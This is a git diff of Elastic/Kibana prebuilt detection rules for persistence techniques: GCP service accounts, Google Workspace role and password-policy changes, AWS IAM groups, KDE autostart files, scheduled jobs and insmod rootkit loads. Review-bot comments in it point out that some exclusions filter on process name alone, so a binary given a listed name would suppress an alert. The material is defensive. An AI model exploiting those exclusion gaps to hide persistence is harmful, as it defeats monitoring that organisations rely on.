"references": [ "https://cloud.google.com/iam/docs/service-accounts", "https://cloud.google.com/iam/docs/creating-managing-service-account-keys" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0e5acaae-6a64-4bbc-adb8-27649c03f7e1", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", 
@@ -49,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json index d37cc80d562cd..d93609c6af492 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Service Account Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.CreateServiceAccount and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccount and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/service-accounts" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "7ceb2216-47dd-4e64-9433-cddc99727623", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json index 6f19c1f60c05a..8f4360e9f603d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json 
@@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Admin Role Assigned to a User", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ASSIGN_ROLE\n", "references": [ "https://support.google.com/a/answer/172176?hl=en" ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "68994a6c-c7ba-4e82-b476-26a26877adf6", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json index 6d08829d787f4..d29698c5a919a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json 
@@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace API Access Granted via Domain-Wide Delegation of Authority", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:AUTHORIZE_API_CLIENT_ACCESS\n", "references": [ "https://developers.google.com/admin-sdk/directory/v1/guides/delegation" ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "acbc8bb9-2486-49a8-8779-45fb5f9a93ee", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json index 7c92fa8fd6721..79575a29738e5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json 
@@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Custom Admin Role Created", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:CREATE_ROLE\n", "references": [ "https://support.google.com/a/answer/2406043?hl=en" ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ad3f2807-2b3e-47d7-b282-f84acbbe14be", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_policy_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_policy_modified.json new file mode 100644 index 0000000000000..a3fc5fdf7f11f --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_policy_modified.json 
@@ -0,0 +1,86 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when a Google Workspace password policy is modified. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", + "false_positives": [ + "Password policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Google Workspace Password Policy Modified", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and\n event.action:(CHANGE_APPLICATION_SETTING or CREATE_APPLICATION_SETTING) and\n google_workspace.admin.setting.name:(\n \"Password Management - Enforce strong password\" or\n \"Password Management - Password reset frequency\" or\n \"Password Management - Enable password reuse\" or\n \"Password Management - Enforce password policy at next login\" or\n \"Password Management - Minimum password length\" or\n \"Password Management - Maximum password length\"\n )\n", + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.admin.setting.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Identity and Access", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": 
"https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 15 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json index 8c3018514febb..c283d16ae6a07 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json 
@@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Role Modified", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:(ADD_PRIVILEGE or UPDATE_ROLE)\n", "references": [ "https://support.google.com/a/answer/2406043?hl=en" ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6f435062-b7fc-4af9-acea-5b1ead65c5a5", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json index d1a2e8e5f6e95..35e6c8f6d229a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json 
@@ -12,10 +12,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Creation or Modification of a new GPO Scheduled Task or Service",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "file where event.type != \"deletion\" and\n file.path : (\"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\",\n \"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\Preferences\\\\Services\\\\Services.xml\") and\n not process.name : \"dfsrs.exe\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -50,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 7
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json
index bced9ad8da3b2..6a531cf567016 100644
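Review bot: The `## Config` text removed from `note` is moved into the new `setup` field, but the `note` key is kept as an empty string (`+ "note": "",`) rather than dropped, so consumers now see a present-but-empty note instead of an absent one. The same shape appears in the IAM group creation, KDE autostart, scheduled job creation, login/logout hook and DKIM signing hunks on this page. These files look generated from an upstream rule source, so if an absent key is the intended shape the fix presumably belongs in the exporter rather than in these JSON files; if the empty string is deliberate (e.g. to overwrite an existing note on upgrade), that intent is worth stating in the commit description.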
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Group Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:CreateGroup and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/create-group.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "169f3a93-efc7-4df2-94d6-0d9438c310d1", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_insmod_kernel_module_load.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_insmod_kernel_module_load.json new file mode 100644 index 0000000000000..8e7b93b01ef3d --- /dev/null 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_insmod_kernel_module_load.json 
@@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel module load via insmod", + "query": "process where event.type == \"start\" and process.executable : \"/usr/sbin/insmod\" and process.args : \"*.ko\"\n", + "references": [ + "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 85, + "rule_id": "2339f03c-f53f-40fa-834b-40c5983fc41f", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Rootkit" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} 
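Review bot: `"risk_score": 85` is paired with `"severity": "medium"`, which does not follow the pairing used by every other rule on this page (47 with medium, 21 with low), so one of the two values looks wrong; if 85 is intended, the severity should presumably be `high`. The query also anchors on a single path, `process.executable : "/usr/sbin/insmod"`, so hosts where the binary resolves to `/sbin/insmod` (non-merged `/usr`) would not match; `process.executable : ("/usr/sbin/insmod", "/sbin/insmod")` would cover both layouts. The description also has a typo: `suspcious` should read `suspicious`.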
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json
index 347a92cfa8f76..20f94f4f93065 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json
@@ -11,15 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via KDE AutoStart Script or Desktop File Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n )\n", + "note": "", + "query": "file where event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n ) and\n not process.name in (\"yum\", \"dpkg\", \"install\", \"dnf\", \"teams\", \"yum-cron\", \"dnf-automatic\")\n", "references": [ 
"https://userbase.kde.org/System_Settings/Autostart", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json index 91f99808903b9..e14dc175010d6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json 
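Review bot: The new exclusion `not process.name in ("yum", "dpkg", "install", "dnf", "teams", "yum-cron", "dnf-automatic")` filters on `process.name` alone, and names like `install` and `teams` are generic enough that any binary carrying that name suppresses the alert, which widens the false-negative surface beyond the package-manager allowlist the list suggests. Where the expected binaries have fixed install locations, constraining the exclusion by `process.executable` as well keeps the intended benign cases while narrowing what else is filtered. The loginwindow plist hunk further down has the same shape, with `backupd` and `"iMazing Profile Editor"` added to a `process.name`-only exclusion. This hunk starts on the previous line with the `@@ -11,15 +11,38 @@` header.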
@@ -15,10 +15,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Persistence via Scheduled Job Creation",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "file where event.type != \"deletion\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\*\" and file.extension : \"job\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -53,5 +71,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json
